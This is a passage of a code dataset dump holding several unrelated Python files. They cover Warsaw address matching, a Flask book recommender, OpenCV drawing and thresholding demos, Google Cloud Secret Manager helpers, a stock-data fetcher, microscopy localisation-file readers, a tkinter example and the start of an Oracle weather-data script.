'ksawerów'\r\ndistrict_neighbourhood_mapping['moczydło'] = 'koło' \r\ndistrict_neighbourhood_mapping['nadwilanówka'] = 'powsin'\r\ndistrict_neighbourhood_mapping['nowe bródno'] = 'bródno'\r\ndistrict_neighbourhood_mapping['nowe górce'] = 'górce' \r\ndistrict_neighbourhood_mapping['nowy służewiec'] = 'wyczółki'\r\ndistrict_neighbourhood_mapping['pola mokotowskie'] = 'stary mokotów'\r\ndistrict_neighbourhood_mapping['przyczółek grochowski'] = 'grochów'\r\ndistrict_neighbourhood_mapping['stokłosy'] = 'ursynów północny'\r\ndistrict_neighbourhood_mapping['witolin'] = 'gocławek'\r\ndistrict_neighbourhood_mapping['zielona'] = 'zielona-grzybowa'\r\n\r\n\r\n#for item in sample['district'].unique():\r\n# if not item in district_neighbourhood_mapping.keys():\r\n# print(item)\r\n\r\nsample = adr_match.applyMapping(sample, 'district', 'Neighbourhood', district_neighbourhood_mapping,False)\r\n\r\n\r\nam.addressStats(sample,'after filling based on district') \r\n\r\n#\r\n# Sometimes the name of borough or neighbourhood was not matched \r\n# because apart from borough/neighoourhood name there were other words, like \"Wola new apartment\"\r\n# Here we check if in uknown address item there is a name of borough/neighbourhood\r\n#\r\nsample = adr_match.findInUnkowns('Borough',sample)\r\nsample = adr_match.findInUnkowns('Neighbourhood',sample)\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nsample = adr_match.internalFilling(sample,'Neighbourhood','Borough')\r\nsample = adr_match.internalFilling(sample,'Street','Neighbourhood')\r\nsample = adr_match.internalFilling(sample,'Street','Borough')\r\n\r\nam.addressStats(sample,'filling based on other address items') \r\n\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nmapping = matched[matched['Item']=='street'].set_index('Key')['Match'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmapping = matched[matched['Item']=='neighbourhood'].set_index('Key')['Match'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n\r\nam.addressStats(sample,'after using matched') \r\n#\r\n# Matching strings. Sometimes the address of the flat couldn't have been recognized because of typo \r\n# or incomplete name like Mickiewicza instead of Adama Mickiewicza\r\n# Using a sequence matcher we can try to match addresses\r\n\r\n#\r\n# Here we try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the neighbourhood\r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'full', 20) \r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'sort', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'partial', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'set', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough, \r\n# we compare do not compare strings per se, but sorted tokens\r\n# We select only items with matching score higher than 72%. We manually delete some erroneously assigned streets\r\n# Then we select those with score higher than 61 and when the difference between best match and second best match is larger than 10% \r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'sort', 50)\r\nmapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n\r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough\r\n# We select only items with matching score higher than 79%. \r\n#\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'partial', 50)\r\nmapping = matching[matching['Score1']>=90].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'set', 50)\r\nmapping = matching[(matching['Score1']>=73) & (matching['Diff_Score1_Score2']>=10)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n# \r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough\r\n# We select only items with matching score higher than 90%. \r\n#\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'partial', 50)\r\n#mapping = matching[(matching['Score1']>63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'set', 50)\r\n#mapping = matching[(matching['Score1']>63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'full', 50)\r\nmapping = matching[(matching['Score1']>=63)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'sort', 50)\r\n#mapping = matching[(matching['Score1']>=63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n#\r\n# We try to match the neighbourhoods names \r\n# To make algorithm works faster and be less error prone, we try to match neigbourhood names within the borough\r\n# We select only items with matching score higher than 90%. \r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Neighbourhood', 'full', 50)\r\nmapping = matching[(matching['Score1']>=60) ].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Neighbourhood', 'partial', 50)\r\nmapping = matching[(matching['Score1']>76)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n#\r\n# We try to match addresses using not truncated sample as before, but whole list of street/neighbourhood/borough names\r\n#\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'sort', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'full', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'partial', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'set', 40)\r\n#\r\n#matching = adr_match.matchAddresses(sample, None, 'Neighbourhood', 'full', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Neighbourhood', 'sort', 40)\r\n\r\n\r\nam.addressStats(sample,'after sequence matching')\r\n\r\n#\r\n# Examining the unrecognized address items\r\n#\r\n\r\nunknown = sample.groupby(['Unknown']).count()['Street']\r\n\r\n\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nsample = adr_match.internalFilling(sample,'Neighbourhood','Borough')\r\nsample = adr_match.internalFilling(sample,'Street','Neighbourhood')\r\nsample = adr_match.internalFilling(sample,'Street','Borough')\r\n\r\nsample = sample[(sample['Borough'] != '.') | (sample['Neighbourhood'] != '.')]\r\n\r\nam.addressStats(sample,'final')\r\nsample = sample.drop(['Unknown'],axis=1)\r\n\r\n#\r\n# Correcting addreses\r\n# \r\n\r\nmapping = ad.set_index('Neighbourhood')['Borough'].to_dict()\r\nsample['check'] = sample['Neighbourhood'].map(mapping).fillna(\".\").astype(str)\r\nsample['Borough'] = [c if (b != c) and (c!='.') else b for b,c in zip(sample['Borough'],sample['check'])]\r\nsample = sample.drop('check',axis=1)\r\n#\r\n#matched['id'] = matched.index\r\n#with open('C:/Users/OEM/data_mining/oto_dom/utils/matched.csv', 'w') as f:\r\n# matched.to_csv(f, header=True, na_rep='.', sep=';',encoding='utf-8',index=False)\r\n\r\nsample['Id'] = sample.index\r\nwith open('C:/Users/OEM/data_mining/oto_dom/data/warszawa_addresses.csv', 'w') as f:\r\n sample.to_csv(f, header=True, na_rep='.', sep=';',encoding='utf-8',index=False)\r\n","sub_path":"addresses_warsaw.py","file_name":"addresses_warsaw.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258597445","text":"from util import preprocessor\nfrom util import predictions\nfrom flask import Flask, jsonify, request, render_template\nimport json \n\ndef create_app():\n app = Flask(__name__)\n\n @app.route(\"/\")\n def home():\n return \"Welcome!\"\n\n @app.route('/recommend', methods=['GET', 'POST'])\n def get_recommendation():\n if request.method == 'POST':\n data = request.form['description']\n preds = predictions(data)\n authors = [i.split(\"|\") for i in preds['book_authors']]\n titles = preds['book_title'].to_list()\n result = {}\n for i in range(5):\n result[i]={'title':titles[i], 'author':authors[i]}\n res = result\n return render_template('result.html', res=res)\n return render_template(\"form.html\")\n\n @app.route('/api', methods=['POST'])\n def make_predict():\n #get data\n data = request.get_json(force=True)\n #parse\n predict_request = data['book_desc']\n #preds\n preds = predictions(predict_request)\n #send back to browser\n authors = [i.split(\"|\") for i in preds['book_authors']]\n titles = preds['book_title'].to_list()\n result = {}\n for i in range(5):\n result[i]={'title':titles[i], 'author':authors[i]}\n return json.dumps(result)\n\n return app\n\nAPP = create_app()\n\nif __name__ == \"__main__\":\n APP.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637694752","text":"import numpy as np\r\nimport cv2\r\n\r\ndef readSkeleton(filename):\r\n\tske = []\r\n\tf = open(filename, 'r')\r\n\tlines = f.readlines() \r\n\tf.close()\r\n\tif len(lines) < 1:\r\n\t\treturn ske\r\n\tone_ske = []\r\n\tfor line in lines:\r\n\t\tone_axis = []\r\n\t\tfor l in line.split(','):\r\n\t\t\tdata = int(l)\r\n\t\t\tone_axis.append(data)\r\n\t\tone_ske.append(one_axis)\r\n\t#print(one_ske)\r\n\tske = np.transpose(one_ske)\r\n\tske[:,[0,1]] = ske[:,[1,0]]\r\n\tske = ske.tolist()\r\n\t#print(ske)\r\n\treturn ske\r\n\r\n#Read lookup table\r\ndef readLookupTable(filename):\r\n\ttable = []\r\n\tf = open(filename, 'r')\r\n\tlines = f.readlines()\r\n\tf.close()\r\n\tfor line in lines:\r\n\t\tx, y = [int(i) for i in line.split(':')]\r\n\t\t#minus one, since python count from one for array index\r\n\t\t# x = x -1\r\n\t\t# y = y -1\r\n\t\ttable.append((x,y))\r\n\tprint(table)\r\n\treturn table\r\n\r\n#Gen 14 different colors for 14 edges\r\ndef gen_colors():\r\n\tdelta = 256/4\r\n\tcolors = []\r\n\tfor i in range(0,4):\r\n\t\tfor j in range(0,4):\r\n\t\t\tfor k in range(0,4):\r\n\t\t\t\tcolors.append((delta*i, delta*j, delta *k))\r\n\treturn colors\r\n\r\n#Draw skeleton & picture\r\ndef draw_skeleton(inputframe, one_ske, table):\r\n\tdraw_frame = inputframe.copy()\r\n\ti = 0\t\r\n\t# compute the middle of the hip\r\n\t# centerHipY = (one_ske[4][0]+one_ske[5][0])/2\r\n\t# centerHipX = (one_ske[4][1]+one_ske[5][1])/2\r\n\t# centerHip = (centerHipY, centerHipX)\r\n\t# cv2.line(draw_frame, one_ske[1], centerHip, blue, thickness)\r\n\r\n\tfor xy in table:\r\n\t\tcv2.line(draw_frame, tuple(one_ske[xy[0]]), tuple(one_ske[xy[1]]), colors[i], thickness) \r\n\t\t#draw joints\r\n\t\tcv2.circle(draw_frame, tuple(one_ske[xy[0]]), joint_r, green, 2)\r\n\t\tcv2.circle(draw_frame, tuple(one_ske[xy[1]]), joint_r, green, 2)\r\n\t\ti = i + 1\r\n\tcv2.imshow('mywindow',draw_frame)\t\r\n\treturn draw_frame\r\n\r\n#------------------Skeleton-style---------------\r\nred = (0, 0, 255)\r\ngreen = (0, 255, 0)\r\nblue = (255, 0, 0)\r\nthickness = 10\r\njoint_r = 5\r\ncolors = gen_colors()\r\n\r\nske = readSkeleton(\"1.csv\")\r\ntab = readLookupTable(\"lookup.skeleton\")\r\nimg = cv2.imread(\"3.jpg\")\r\ndraw_skeleton(img,ske,tab)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()","sub_path":"PoseTool/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131739387","text":"from google.cloud import secretmanager\n\n# Import the Secret Manager client library.\n\n# GCP project in which to store secrets in Secret Manager.\nPROJECT_ID = \"billing-sync\"\n\n\ndef create_secret(secret_id):\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent project.\n parent = f\"projects/{PROJECT_ID}\"\n\n # Build a dict of settings for the secret\n secret = {'replication': {'automatic': {}}}\n\n # Create the secret\n try:\n response = client.create_secret(\n secret_id=secret_id, parent=parent, secret=secret)\n # Print the new secret name.\n print(f'Created secret: {response.name}')\n except Exception as exception: # pylint: disable=broad-except\n print(exception.code, exception.message)\n\n\ndef add_secret_version(secret_id, payload):\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent secret.\n parent = f\"projects/{PROJECT_ID}/secrets/{secret_id}\"\n\n # Convert the string payload into a bytes. This step can be omitted if you\n # pass in bytes instead of a str for the payload argument.\n payload = payload.encode('UTF-8')\n\n # Add the secret version.\n response = client.add_secret_version(\n parent=parent, payload={'data': payload})\n\n # Print the new secret version name.\n print(f'Added secret version: {response.name}')\n\n\ndef access_secret_version(the_project_id, secret_id, version_id):\n \"\"\"\n Access the payload for the given secret version if one exists. The version\n can be a version number as a string (e.g. \"5\") or an alias (e.g. \"latest\").\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret version.\n name = f\"projects/{PROJECT_ID}/secrets/{secret_id}/versions/{version_id}\"\n\n # Access the secret version.\n response = client.access_secret_version(request={\"name\": name})\n\n return response.payload.data.decode(\"UTF-8\")\n\n\ndef access_secret_json(the_project_id, secret_id, version_id):\n \"\"\"\n Access the payload for the given secret version if one exists. The version\n can be a version number as a string (e.g. \"5\") or an alias (e.g. \"latest\").\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret version.\n name = f\"projects/{PROJECT_ID}/secrets/{secret_id}/versions/{version_id}\"\n\n # Access the secret version.\n response = client.access_secret_version(request={\"name\": name})\n\n return response.payload.data.decode(\"UTF-8\")\n\n\ndef delete_secret(the_project_id, secret_id):\n \"\"\"\n Delete the secret with the given name and all of its versions.\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret.\n name = client.secret_path(PROJECT_ID, secret_id)\n\n # Delete the secret.\n client.delete_secret(request={\"name\": name})\n\n\ndef list_secrets(the_project_id):\n \"\"\"\n List all secrets in the given project.\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent project.\n parent = f\"projects/{PROJECT_ID}\"\n\n # List all secrets.\n for secret in client.list_secrets(request={\"parent\": parent}):\n print(f\"Found secret: {secret.name}\")\n\n\nprint(\"Secret Manager: started\")\n","sub_path":"secret_manager.py","file_name":"secret_manager.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384193814","text":"import requests\nfrom configparser import ConfigParser\n\n# read the api key from the config file\ndef read_api_key(filename):\n parser = ConfigParser()\n\n parser = ConfigParser()\n parser.read(filename)\n\n return parser.get('keys', 'api-key')\n\ndef get_stock_data(symbol, start_date, end_date):\n base_url = \"https://api.tiingo.com/tiingo/daily/\" + symbol + \"/prices\"\n api_key = read_api_key(\"api-key.ini\")\n print(api_key)\n payload = {\n 'token': api_key,\n 'startDate': start_date,\n 'endDate': end_date\n }\n response = requests.get(base_url, params=payload)\n return response\n\nif __name__ == \"__main__\":\n print(\"data_retriever.py\")\n res = get_stock_data(\"PFE\", '2018-03-25', '2019-04-25')\n print(res.json())\n","sub_path":"data_retriever.py","file_name":"data_retriever.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459191149","text":"import cv2 as cv\r\nimport numpy as np \r\n\r\nimg = cv.imread('gradient.png',0) #_, is a variable name\r\n_, th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)#binary threshhold \r\n_, th2 = cv.threshold(img,127,255,cv.THRESH_BINARY_INV)#inverses the value \r\n\r\ncv.imshow('image',img)\r\ncv.imshow('TH1',th1)\r\ncv.imshow('TH2',th2)\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()\r\n\r\n","sub_path":"simplethreshold.py","file_name":"simplethreshold.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79510722","text":"#from lxml import etree\nimport requests\n#import demjson\n\nx = 0\ny = 0\n\nmovie = []\n\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',\n 'Accept-Language':'zh-CN,zh;q=0.9'\n}\n\nfirst = 'https://www.toutiao.com/stream/widget/local_weather/city/'\n\ndef get_detail_urls(url):\n \"\"\" 获取一页电影 \"\"\"\n global y\n response = requests.get(url,headers=HEADERS)\n text = response.text\n print (text)\n #html = etree.HTML(text)\n #detail_urls = html.xpath(\"//table[@class='tbspan']//a/@href\")\n #detail_urls = map(lambda url:frist+url,detail_urls)\n #y += 1\n #print('='*30)\n #print('第{}页开始爬取!'.format(y))\n #print('=' * 30)\n #return detail_urls \n\nif __name__ == '__main__':\n get_detail_urls(first)\n","sub_path":"spider-movie.py","file_name":"spider-movie.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180442032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 24 12:47:19 2015\n\n@author: berliner\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport numpy as np\nfrom pandas import DataFrame\n\nclass indexGenerator():\n \"\"\" Generates an increasing index for each localisation based on the frame\n number. Assumes the frames to be ordered. For use with pandas multiindex\n DataFrames \"\"\"\n def __init__(self):\n self.currentFrame = 0\n self.previousFrame = 0\n self.idx = -1\n\n def __call__(self, frame):\n if frame == self.currentFrame:\n self.idx += 1\n return self.idx\n else:\n # update the frames\n self.previousFrame = self.currentFrame\n self.currentFrame = frame\n self.idx = 0\n return self.idx\n\ndef generateIndex(allData, imageNumber):\n idx = indexGenerator()\n # assemble the index structure for the DataFrame\n level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,imageNumber] ]\n level2 = [ idx(frame) for frame in allData[:,imageNumber] ]\n index = [ level1, level2 ]\n return index\n\ndef readThunderstormLocalisations(fname, pixelSize=1.0):\n \"\"\" Read Thunderstorm localisation files \"\"\"\n # Read the header\n with open(fname, 'r') as f:\n header = [ item.strip('\"') for item in f.readline().strip().split(',') ]\n # Check the required columns\n assert( 'x [nm]' in header )\n assert( 'y [nm]' in header )\n assert( 'frame' in header )\n assert( 'intensity [photon]' in header )\n assert( 'offset [photon]' in header )\n assert( 'bkgstd [photon]' in header )\n assert( 'uncertainty [nm]' in header )\n \n xPositionIndex = header.index('x [nm]')\n yPositionIndex = header.index('y [nm]')\n uncertaintyIndex = header.index('uncertainty [nm]')\n intensityIndex = header.index('intensity [photon]')\n frameIndex = header.index('frame')\n offsetIndex = header.index('offset [photon]')\n bkgstdIndex = header.index('bkgstd [photon]')\n sigmaIndex = header.index('sigma [nm]')\n \n # Read the data\n allData = np.loadtxt(fname, skiprows=1, delimiter=',')\n \n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n \n # Select the columns\n dataIndexes = [xPositionIndex, yPositionIndex, uncertaintyIndex, intensityIndex, \\\n frameIndex, sigmaIndex, offsetIndex, bkgstdIndex ]\n\n columns = ['x','y','uncertainty', 'intensity [photon]', 'frame', \\\n 'sigma', 'offset [photon]', 'bkgstd [photon]']\n \n # Assemble the data into a DataFrame\n data = DataFrame(allData[:,dataIndexes], columns=columns, index=index)\n \n # Convert from nm to px \n data[['x','y','uncertainty','sigma']] = data[['x','y','uncertainty','sigma']] / float(pixelSize)\n \n \n return data\n \n \n\ndef readRapidStormLocalisations(fname, photonConversion=1.0, pixelSize=1.0):\n \"\"\" Read rapidStorm localisations from text file.\n \n photonConversion should be set to convert the photon counts correctly\n \n with,\n x = x position\n sx = error of x position\n y = y position\n sy = error of y position\n amp = amplitude\n \n \"\"\"\n assert( isinstance(pixelSize, float) or isinstance(pixelSize, int) ) # int for backwards compatibility\n \n photonConversion = float(photonConversion)\n \n# idx = indexGenerator()\n pixelSize = float(pixelSize)\n \n xPosition = None\n xPositionUncertainty = None\n yPosition = None\n yPositionUncertainty = None\n amplitude = None\n imageNumber = None\n PSFpositionX = None\n PSFpositionY = None\n fitResidues = None\n \n with open(fname, 'r') as f:\n # check the file structure\n header = f.readline()\n # \n root = ET.fromstring(header[2:])\n for index, child in enumerate(root):\n if child.attrib['identifier'] == 'Position-0-0':\n xPosition = index\n elif child.attrib['identifier'] == 'Position-0-0-uncertainty':\n xPositionUncertainty = index\n elif child.attrib['identifier'] == 'Position-1-0':\n yPosition = index\n elif child.attrib['identifier'] == 'Position-1-0-uncertainty':\n yPositionUncertainty = index\n elif child.attrib['identifier'] == 'Amplitude-0-0':\n amplitude = index\n elif child.attrib['identifier'] == 'ImageNumber-0-0':\n imageNumber = index\n elif child.attrib['identifier'] == 'PSFWidth-0-0':\n PSFpositionX = index\n elif child.attrib['identifier'] == 'PSFWidth-1-0':\n PSFpositionY = index\n elif child.attrib['identifier'] == 'FitResidues-0-0':\n fitResidues = index\n elif child.attrib['identifier'] == 'LocalBackground-0-0':\n localBackground = index\n \n # make sure all necessary fields have been identified\n assert( xPosition != None )\n assert( yPosition != None )\n assert( amplitude != None )\n assert( imageNumber != None )\n \n ## read the full file and add a NaN column\n allData = np.loadtxt(fname, skiprows=1)\n rowCount = np.shape(allData)[0]\n \n # calculate the SNR\n SNR = np.zeros((rowCount,1))\n SNR[:,0] = allData[:,amplitude] / allData[:,localBackground]\n allData = np.concatenate((allData,SNR),axis=1)\n SNRindex = np.shape(allData)[1] - 1\n \n # add groupID\n# groupID = np.reshape( np.arange(rowCount), (-1,1) )\n zeros = np.zeros((rowCount,1))\n zeros.fill(np.NaN)\n allData = np.concatenate((allData,zeros),axis=1)\n \n# groupIDindex = -2\n \n # convert the amplitude to photon count\n allData[:,amplitude] /= photonConversion\n \n # convert the pixelSize\n allData[:,[xPosition,yPosition]] /= pixelSize\n\n \n # check which data is there and what needs to be added\n if xPositionUncertainty is None:\n xPositionUncertainty = -1 # select the last column of all zeros\n yPositionUncertainty = -1\n if PSFpositionX is None:\n PSFpositionX = -1\n PSFpositionY = -1\n if fitResidues is None:\n fitResidues = -1\n \n dataIndexes = [xPosition, yPosition, xPositionUncertainty, yPositionUncertainty, \\\n amplitude, imageNumber, fitResidues, SNRindex]\n \n # assemble the index structure for the DataFrame\n index = generateIndex(allData, imageNumber)\n# level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,imageNumber] ]\n# level2 = [ idx(frame) for frame in allData[:,imageNumber] ]\n# index = [ level1, level2 ]\n \n columns = ['x','y','Uncertainty x','Uncertainty y','Photon Count', 'frame', \\\n 'FitResidue', 'SNR']\n \n data = DataFrame(allData[:,dataIndexes], columns=columns, index=index)\n\n return data\n\n\n\n\ndef readXYTLocalisations(fname, pixelSize=1.0):\n \"\"\"\n Read a generic xyt file. The first line is used as header information.\n The following columns must be present (case sensitive!),\n \n x y frame\n \n the remaining columns are read and can be used for filtering.\n \"\"\"\n # Read the header\n with open(fname, 'r') as f:\n header = f.readline().strip().split('\\t')\n # Check the required columns\n assert( 'x' in header )\n assert( 'y' in header )\n assert( 'frame' in header )\n \n # Read the data\n allData = np.loadtxt(fname, skiprows=1)\n \n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n frameIndex = header.index('frame')\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n# idx = indexGenerator()\n# level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,frameIndex] ]\n# level2 = [ idx(frame) for frame in allData[:,frameIndex] ]\n# index = [ level1, level2 ]\n \n # Put the data together\n data = DataFrame(allData, index=index, columns=header)\n \n # Convert from nm to px \n data[['x','y']] = data[['x','y']] / float(pixelSize)\n \n return data\n\n\n\ndef readLEBLocalisations(fname, skiprows, columns):\n # Read the data\n allData = np.loadtxt(fname, skiprows=skiprows)\n\n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n frameIndex = columns.index('frame')\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n \n # Put the data together\n data = DataFrame(allData, index=index, columns=columns)\n \n return data\n\n\n\n\n\n\n","sub_path":"lib/readLocalisations.py","file_name":"readLocalisations.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149074161","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 21 10:45:42 2021\r\n\r\n@author: a.mika2\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nwindow=tk.Tk()\r\n\r\nwindow.geometry(\"510x600\")\r\nwindow.resizable(False,False)\r\n\r\nglobal label\r\nlabel = tk.Label(window, text=\"Please ensure that you use the correct data type\", fg='red')\r\n\r\ndef submit():\r\n try:\r\n print(f'Entry: {str_entry_var.get()}')\r\n print(f'Password Entry: {int_entry_var.get()}')\r\n print(f'Radio Buttons: {double_entry_var.get()}')\r\n print(f'Check Button 1: {double_entry_var.get()}')\r\n print(f'Check Button 2: {boolean_entry_var.get()}')\r\n except:\r\n label.pack()\r\n else:\r\n label.pack_forget()\r\n\r\nstr_entry_var=tk.StringVar()\r\nstr_entry=tk.Entry(window,textvariable=str_entry_var)\r\nstr_entry.pack()\r\n\r\nint_entry_var=tk.IntVar()\r\nint_entry=tk.Entry(window,textvariable=int_entry_var)\r\nint_entry.pack()\r\n\r\ndouble_entry_var=tk.DoubleVar()\r\ndouble_entry=tk.Entry(window,textvariable=double_entry_var)\r\ndouble_entry.pack()\r\n\r\nboolean_entry_var=tk.BooleanVar()\r\nboolean_entry=tk.Entry(window,textvariable=boolean_entry_var)\r\nboolean_entry.pack()\r\n\r\nbutton=tk.Button(window, text='Submit', command=submit)\r\nbutton.pack()\r\n\r\nwindow.mainloop()","sub_path":"Widgets&Variables/variables_example.py","file_name":"variables_example.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"522697246","text":"import win32com.client\nimport cx_Oracle as ora\nimport os.path\n#from datetime import timezone\nimport datetime\nimport pytz\nfrom statsmodels.miscmodels import count\nimport csv\nimport pandas\nimport numpy as np\n\nimport credentials as cr\n\nlocal_tz = pytz.timezone('Europe/Moscow')\n\ndef utc_to_local(utc_dt):\n local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)\n return local_tz.normalize(local_dt) # .normalize might be unnecessary\n\ndef main():\n #Oracle connection\n dsnStr = ora.makedsn(cr.db_address, cr.db_port, 'DWH')\n con = ora.connect(user=cr.db_user, password=cr.db_pass, dsn=dsnStr)\n\n\n #Take last date from SQL Table\n cur = con.cursor()\n cur.execute('''select max(date_temp) dt\n from vklim.weather t''')\n for row in cur:\n max_data = row[0]\n max_data = utc_to_local(max_data)\n print(\"last date in vklim.weather {}\".format(max_data))\n\n actual_data = []\n next_date = max_data + datetime.timedelta(days=1) #getting next date\n next_date_str = next_date.strftime(\"%d.%m.%Y\") #next date to string format\n\n path_weather = 